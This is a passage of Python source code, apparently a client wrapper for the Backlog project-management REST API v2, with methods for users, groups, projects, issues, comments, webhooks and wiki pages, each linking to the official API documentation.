url = self._makeurl( "/api/v2/users" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def updateUser( self, userId,
password = None,
name = None,
mailAddress = None,
roleType = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-user
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "password", password )
_addkw( data, "name", name )
_addkw( data, "mailAddress", mailAddress )
_addkw( data, "roleType", roleType )
url = self._makeurl( "/api/v2/users/" + str( userId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteUser( self, userId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-user
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/users/" + str( userId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getOwnUser( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-own-user
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/users/myself" )
return self._api_return(
requests.get( url, params = params ) )
def getUserIcon( self, userId,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-user-icon
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/users/" + str( userId ) + "/icon" )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def getUserRecentUpdates( self, userId,
activityTypeIds = None,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-user-recent-updates
"""
params = { "apiKey": self.apikey }
_addkws( params, "activityTypeIds", activityTypeIds )
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/users/" + str( userId ) + "/activities" )
return self._api_return(
requests.get( url, params = params ) )
def getReceivedStarList( self, userId,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-received-star-list
"""
params = { "apiKey": self.apikey }
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/users/" + str( userId ) + "/stars" )
return self._api_return(
requests.get( url, params = params ) )
def countUserReceivedStars( self, userId,
since = None,
until = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/count-user-received-stars
"""
params = { "apiKey": self.apikey }
_addkw( params, "since", since )
_addkw( params, "until", until )
url = self._makeurl( "/api/v2/users/" + str( userId ) + "/stars/count" )
return self._api_return(
requests.get( url, params = params ) )
def getListOfRecentlyViewedIssues( self,
order = None,
offset = None,
count = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-recently-viewed-issues
"""
params = { "apiKey": self.apikey }
_addkw( params, "order", order )
_addkw( params, "offset", offset )
_addkw( params, "count", count )
url = self._makeurl( "/api/v2/users/myself/recentlyViewedIssues" )
return self._api_return(
requests.get( url, params = params ) )
def getListOfRecentlyViewedProjects( self,
order = None,
offset = None,
count = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-recently-viewed-projects
"""
params = { "apiKey": self.apikey }
_addkw( params, "order", order )
_addkw( params, "offset", offset )
_addkw( params, "count", count )
url = self._makeurl( "/api/v2/users/myself/recentlyViewedProjects" )
return self._api_return(
requests.get( url, params = params ) )
def getListOfRecentlyViewedWikis( self,
order = None,
offset = None,
count = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-recently-viewed-wikis
"""
params = { "apiKey": self.apikey }
_addkw( params, "order", order )
_addkw( params, "offset", offset )
_addkw( params, "count", count )
url = self._makeurl( "/api/v2/users/myself/recentlyViewedWikis" )
return self._api_return(
requests.get( url, params = params ) )
def getListOfGroups( self,
order = None,
offset = None,
count = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-groups
"""
params = { "apiKey": self.apikey }
_addkw( params, "order", order )
_addkw( params, "offset", offset )
_addkw( params, "count", count )
url = self._makeurl( "/api/v2/groups" )
return self._api_return(
requests.get( url, params = params ) )
def addGroup( self, name,
members = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-group
"""
params = { "apiKey": self.apikey }
data = { "name": name }
_addkws( data, "members", members )
url = self._makeurl( "/api/v2/groups" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getGroup( self, groupId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-group
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/groups/" + str( groupId ) )
return self._api_return(
requests.get( url, params = params ) )
def updateGroup( self, groupId,
name = None,
members = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-group
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "name", name )
_addkws( data, "members", members )
url = self._makeurl( "/api/v2/groups/" + str( groupId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteGroup( self, groupId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-group
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/groups/" + str( groupId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getStatusList( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-status-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/statuses" )
return self._api_return(
requests.get( url, params = params ) )
def getResolutionList( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-resolution-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/resolutions" )
return self._api_return(
requests.get( url, params = params ) )
def getPriorityList( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-priority-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/priorities" )
return self._api_return(
requests.get( url, params = params ) )
def getProjectList( self,
archived = None,
all = False ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project-list
"""
params = { "apiKey": self.apikey }
_addkw( params, "archived", archived )
_addkw( params, "all", all )
url = self._makeurl( "/api/v2/projects" )
return self._api_return(
requests.get( url, params = params ) )
def addProject( self, name, key, chartEnabled, subtaskingEnabled, textFormattingRule,
projectLeaderCanEditProjectLeader = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-project
"""
params = { "apiKey": self.apikey }
data = { "name": name, "key": key }
_addkw( data, "chartEnabled", chartEnabled )
_addkw( data, "subtaskingEnabled", subtaskingEnabled )
_addkw( data, "textFormattingRule", textFormattingRule )
_addkw( data, "projectLeaderCanEditProjectLeader", projectLeaderCanEditProjectLeader )
url = self._makeurl( "/api/v2/projects" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getProject( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" ) + str( projectIdOrKey )
return self._api_return(
requests.get( url, params = params ) )
def updateProject( self, projectIdOrKey,
name = None,
key = None,
chartEnabled = None,
subtaskingEnabled = None,
projectLeaderCanEditProjectLeader = None,
textFormattingRule = None,
archived = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-project
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "name", name )
_addkw( data, "key", key )
_addkw( data, "chartEnabled", chartEnabled )
_addkw( data, "subtaskingEnabled", subtaskingEnabled )
_addkw( data, "textFormattingRule", textFormattingRule )
_addkw( data, "projectLeaderCanEditProjectLeader", projectLeaderCanEditProjectLeader )
_addkw( data, "archived", archived )
url = self._makeurl( "/api/v2/projects/" ) + str( projectIdOrKey )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteProject( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-project
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" ) + str( projectIdOrKey )
return self._api_return(
requests.delete( url, params = params ) )
def getProjectIcon( self, projectIdOrKey,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project-icon
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + "/image" )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def getProjectRecentUpdates( self, projectIdOrKey,
activityTypeIds = None,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project-recent-updates
"""
params = { "apiKey": self.apikey }
_addkws( params, "activityTypeIds", activityTypeIds )
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/activities" )
return self._api_return(
requests.get( url, params = params ) )
def addProjectUser( self, projectIdOrKey, userId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-project-user
"""
params = { "apiKey": self.apikey }
data = { "userId": userId }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/users" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getProjectUserList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project-user-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/users" )
return self._api_return(
requests.get( url, params = params ) )
def deleteProjectUser( self, projectIdOrKey, userId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-project-user
"""
params = { "apiKey": self.apikey }
data = { "userId": userId }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/users" )
return self._api_return(
requests.delete( url, params = params, data = data ) )
def addProjectAdministrator( self, projectIdOrKey, userId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-project-administrator
"""
params = { "apiKey": self.apikey }
data = { "userId": userId }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/administrators" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getListOfProjectAdministrators( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-project-administrators
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/administrators" )
return self._api_return(
requests.get( url, params = params ) )
def deleteProjectAdministrator( self, projectIdOrKey, userId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-project-administrator
"""
params = { "apiKey": self.apikey }
data = { "userId": userId }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/administrators" )
return self._api_return(
requests.delete( url, params = params, data = data ) )
def getIssueTypeList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-issue-type-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/issueTypes" )
return self._api_return(
requests.get( url, params = params ) )
def addIssueType( self, projectIdOrKey, name, color ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-issue-type
"""
params = { "apiKey": self.apikey }
data = { "name": name, "color": color }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/issueTypes" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def updateIssueType( self, projectIdOrKey, id,
name = None,
color = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-issue-type
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "name", name )
_addkw( data, "color", color )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/issueTypes/" + str( id ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteIssueType( self, projectIdOrKey, id, substituteIssueTypeId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-issue-type
"""
params = { "apiKey": self.apikey }
data = { "substituteIssueTypeId": str( substituteIssueTypeId ) }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/issueTypes/" + str( id ) )
return self._api_return(
requests.delete( url, params = params, data = data ) )
def getCategoryList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-category-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/categories" )
return self._api_return(
requests.get( url, params = params ) )
def addCategory( self, projectIdOrKey, name ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-category
"""
params = { "apiKey": self.apikey }
data = { "name": name }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/categories" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def updateCategory( self, projectIdOrKey, id, name ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-category
"""
params = { "apiKey": self.apikey }
data = { "name": name }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/categories/" + str( id ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteCategory( self, projectIdOrKey, id ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-category
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/categories/" + str( id ) )
return self._api_return(
requests.delete( url, params = params ) )
def getVersionMilestoneList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-version-milestone-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/versions" )
return self._api_return(
requests.get( url, params = params ) )
def addVersionMilestone( self, projectIdOrKey, name,
description = None,
startDate = None,
releaseDueDate = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-version-milestone
startDate,releaseDueDate : YYYY-MM-DD
"""
params = { "apiKey": self.apikey }
data = { "name": name }
_addkw( data, "description", description )
_addkw( data, "startDate", startDate )
_addkw( data, "releaseDueDate", releaseDueDate )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/versions" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def updateVersionMilestone( self, projectIdOrKey, id, name,
description = None,
startDate = None,
releaseDueDate = None,
archived = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-version-milestone
startDate,releaseDueDate : YYYY-MM-DD
"""
params = { "apiKey": self.apikey }
data = { "name": name }
_addkw( data, "description", description )
_addkw( data, "startDate", startDate )
_addkw( data, "releaseDueDate", releaseDueDate )
_addkw( data, "archived", archived )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/versions/" + str( id ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteVersion( self, projectIdOrKey, id ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-version
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/versions/" + str( id ) )
return self._api_return(
requests.delete( url, params = params ) )
def getCustomFieldList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-custom-field-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields" )
return self._api_return(
requests.get( url, params = params ) )
def addCustomField( self, projectIdOrKey, typeId, name, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-custom-field
"""
tuples = ["items", "applicableIssueTypes"]
params = { "apiKey": self.apikey }
data = { "typeId": typeId, "name": name }
for k, v in kwargs.items():
_dicset( data, k, v, tuples )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def updateCustomField( self, projectIdOrKey, customFieldId, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-custom-field
"""
tuples = ["items", "applicableIssueTypes"]
params = { "apiKey": self.apikey }
data = {}
for k, v in kwargs.items():
_dicset( data, k, v, tuples )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields/" + str( customFieldId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteCustomField( self, projectIdOrKey, customFieldId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-custom-field
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields/" + str( customFieldId ) )
return self._api_return(
requests.delete( url, params = params ) )
def addListItemForListTypeCustomField( self, projectIdOrKey, customFieldId, name ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-list-item-for-list-type-custom-field
"""
params = { "apiKey": self.apikey }
data = { "name": name }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields/" + str( customFieldId ) + \
"/items" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def updateListItemForListTypeCustomField( self, projectIdOrKey, customFieldId, itemId, name ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-list-item-for-list-type-custom-field
"""
params = { "apiKey": self.apikey }
data = { "name": name }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields/" + str( customFieldId ) + \
"/items/" + str( itemId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteListItemForListTypeCustomField( self, projectIdOrKey, customFieldId, itemId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-list-item-for-list-type-custom-field
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/customFields/" + str( customFieldId ) + \
"/items/" + str( itemId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getListOfSharedFiles( self, projectIdOrKey,
path = "",
order = None,
offset = None,
count = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-shared-files
"""
params = { "apiKey": self.apikey }
_addkw( params, "order", order )
_addkw( params, "offset", offset )
_addkw( params, "count", count )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/files/metadata/" + str( path ) )
return self._api_return(
requests.get( url, params = params ) )
def getFile( self, projectIdOrKey, sharedFileId,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-file
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/files/" + str( sharedFileId ) )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def getProjectDiskUsage( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project-disk-usage
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/diskUsage" )
return self._api_return(
requests.get( url, params = params ) )
def getListOfWebhooks( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-webhooks
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/webhooks" )
return self._api_return(
requests.get( url, params = params ) )
def addWebhook( self, projectIdOrKey, name, hookUrl,
description = None,
allEvent = None,
activityTypeIds = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-webhook
"""
params = { "apiKey": self.apikey }
data = { "name": name, "hookUrl": hookUrl }
_addkw( data, "description", description )
_addkw( data, "allEvent", allEvent )
_addkws( data, "activityTypeIds", activityTypeIds )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/webhooks" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getWebhook( self, projectIdOrKey, webhookId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-webhook
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/webhooks/" + str( webhookId ) )
return self._api_return(
requests.get( url, params = params ) )
def updateWebhook( self, projectIdOrKey, webhookId,
name = None,
hookUrl = None,
description = None,
allEvent = None,
activityTypeIds = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-webhook
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "name", name )
_addkw( data, "description", description )
_addkw( data, "hookUrl", hookUrl )
_addkw( data, "allEvent", allEvent )
_addkws( data, "activityTypeIds", activityTypeIds )
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/webhooks/" + str( webhookId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteWebhook( self, projectIdOrKey, webhookId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-webhook
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/webhooks/" + str( webhookId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getIssueList( self, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-issue-list
"""
tuples = [ "projectIds", "issueTypeIds", "categoryIds", "versionIds", \
"milestoneIds", "statusIds", "priorityIds", "assigneeIds", \
"createdUserIds", "resolutionIds", "ids", "parentIssueIds" ]
params = { "apiKey": self.apikey }
for k, w in kwargs.items():
_dicset(params,k,w,tuples)
url = self._makeurl( "/api/v2/issues" )
return self._api_return(
requests.get( url, params = params ) )
def countIssue( self, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/count-issue
"""
tuples = [ "projectIds", "issueTypeIds", "categoryIds", "versionIds", \
"milestoneIds", "statusIds", "priorityIds", "assigneeIds", \
"createdUserIds", "resolutionIds", "ids", "parentIssueIds" ]
params = { "apiKey": self.apikey }
for k, w in kwargs.items():
_dicset(params,k,w,tuples)
url = self._makeurl( "/api/v2/issues/count" )
return self._api_return(
requests.get( url, params = params ) )
def addIssue( self, projectId, summary, issueTypeId, priorityId, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-issue
"""
tuples = [ "categoryIds", "versionIds", "milestoneIds", "notifiedUserIds", "attachmentIds" ]
params = { "apiKey": self.apikey }
data = { "projectId": projectId, "summary": summary, "issueTypeId": issueTypeId, "priorityId": priorityId }
for k, w in kwargs.items():
_dicset(data,k,w,tuples)
url = self._makeurl( "/api/v2/issues" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getIssue( self, issueIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-issue
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) )
return self._api_return(
requests.get( url, params = params ) )
def updateIssue( self, issueIdOrKey, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-issue
"""
tuples = [ "categoryIds", "versionIds", "milestoneIds", "notifiedUserIds", "attachmentIds" ]
params = { "apiKey": self.apikey }
data = {}
for k, w in kwargs.items():
_dicset(data,k,w,tuples)
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteIssue( self, issueIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-issue
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) )
return self._api_return(
requests.delete( url, params = params ) )
def getCommentList( self, issueIdOrKey,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-comment-list
"""
params = { "apiKey": self.apikey }
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments" )
return self._api_return(
requests.get( url, params = params ) )
def addComment( self, issueIdOrKey, content,
notifiedUserIds = None,
attachmentIds = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-comment
"""
params = { "apiKey": self.apikey }
data = {"content": content}
_addkw( data, "content", content )
_addkws( data, "notifiedUserId", notifiedUserIds )
_addkws( data, "attachmentId", attachmentIds )
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def countComment( self, issueIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/count-comment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/count" )
return self._api_return(
requests.get( url, params = params ) )
def getComment( self, issueIdOrKey, commentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-comment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/" + str( commentId ) )
return self._api_return(
requests.get( url, params = params ) )
def updateComment( self, issueIdOrKey, commentId, content ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-comment
"""
params = { "apiKey": self.apikey }
data = { "content": content }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/" + str( commentId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def getListPfCommentNotifications( self, issueIdOrKey, commentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-comment-notifications
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/" + str( commentId ) + \
"/notifications" )
return self._api_return(
requests.get( url, params = params ) )
def addCommentNotification( self, issueIdOrKey, commentId, notifiedUserIds ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-comment-notification
"""
params = { "apiKey": self.apikey }
data = {}
_addkws( data, "notifiedUserId", notifiedUserIds )
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/" + str( commentId ) + \
"/notifications" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getListOfIssueAttachments( self, issueIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-issue-attachments
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/attachments" )
return self._api_return(
requests.get( url, params = params ) )
def getIssueAttachment( self, issueIdOrKey, attachmentId,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-issue-attachment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/attachments/" + str( attachmentId ) )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def deleteIssueAttachment( self, issueIdOrKey, attachmentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-issue-attachment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/attachments/" + str( attachmentId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getListOfLinkedSharedFiles( self, issueIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-linked-shared-files
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/sharedFiles" )
return self._api_return(
requests.get( url, params = params ) )
def removeLinkToSharedFileFromIssue( self, issueIdOrKey, fileId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/remove-link-to-shared-file-from-issue
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "fileId", fileId )
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/sharedFiles/" + str( fileId ) )
return self._api_return(
requests.delete( url, params = params, data = data ) )
def getWikiPageList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-wiki-page-list
"""
params = { "apiKey": self.apikey, "projectIdOrKey": projectIdOrKey }
url = self._makeurl( "/api/v2/wikis" )
return self._api_return(
requests.get( url, params = params ) )
def countWikiPage( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/count-wiki-page
"""
params = { "apiKey": self.apikey, "projectIdOrKey": projectIdOrKey }
url = self._makeurl( "/api/v2/wikis/count" )
return self._api_return(
requests.get( url, params = params ) )
def getWikiPageTagList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-wiki-page-tag-list
"""
params = { "apiKey": self.apikey, "projectIdOrKey": projectIdOrKey }
url = self._makeurl( "/api/v2/wikis/tags" )
return self._api_return(
requests.get( url, params = params ) )
def addWikiPage( self, projectId, name, content,
mailNotify = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-wiki-page
"""
params = { "apiKey": self.apikey }
data = { "projectId": projectId , "name": name, "content": content }
_addkw( data, "mailNotify", mailNotify )
url = self._makeurl( "/api/v2/wikis" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getWikiPage( self, wikiId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-wiki-page
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) )
return self._api_return(
requests.get( url, params = params ) )
def updateWikiPage( self, wikiId,
name = None,
content = None,
mailNotify = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-wiki-page
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "name", name )
_addkw( data, "content", content )
_addkw( data, "mailNotify", mailNotify )
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteWikiPage( self, wikiId,
mailNotify = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-wiki-page
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "mailNotify", mailNotify )
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) )
return self._api_return(
requests.delete( url, params = params, data = data ) )
def getListOfWikiAttachments( self, wikiId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-wiki-attachments
"""
params = { "apiKey": self.apikey }
